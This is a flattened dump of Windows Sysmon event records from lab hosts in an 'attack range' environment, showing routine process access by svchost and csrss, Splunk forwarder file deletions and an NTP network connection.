11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1B63-6216-8505-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.301{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B63-6216-8505-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:51.302{4F8D34B0-1B63-6216-8505-000000003902}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:52.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=992D9CB2C6FE1BD060D7A96B2DDAECD0,SHA256=089E51B431E58E655E8D15766CC304540C6E94501892BEBCBF9E000A7AEF73D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:52.519{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65771444811F49FFFD6C3C803E699AA0,SHA256=6A003B9B687FDC22A0B546657D13BA449CB046D807E891EF270CC6F2CD67C0B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:52.004{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E5CC35091903923C13C1C1885E5988C,SHA256=7AAB70C6F880AE33BCA7C200D57368DF07508E06BE28EF6FEFA30A24D462F848,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:53.679{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DEF144DC1A07DEEE4E26BAEACB11F4F,SHA256=9F5507BC194EE1BA29B6FABAFD9DBDD8168A73FFFEBF0B4CF5A36B6047E3C54A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:53.035{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D2EEE1DB9247226DF7681619666EEF,SHA256=435BEAA628CACE1C6FA59AE66F3CC663ADF067D34ACE941A2E85FFCCC615830E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:51.402{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local123ntpfalse169.254.169.123-123ntp 23542300x8000000000000000300440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:54.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E2593A5822BDDAAD18215B4143D1F53,SHA256=2D8F3E541B3D8EB9ACDCDD1D1C07A6E6E7D25F30063CB1248114F0694B996780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:54.066{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C154553A5F8074B781D5DDEC87488DBD,SHA256=1B9E49EDE63C011A5646DF7E348DEF7068BA8F822AFB84BCCD3E6F4E6C187C27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 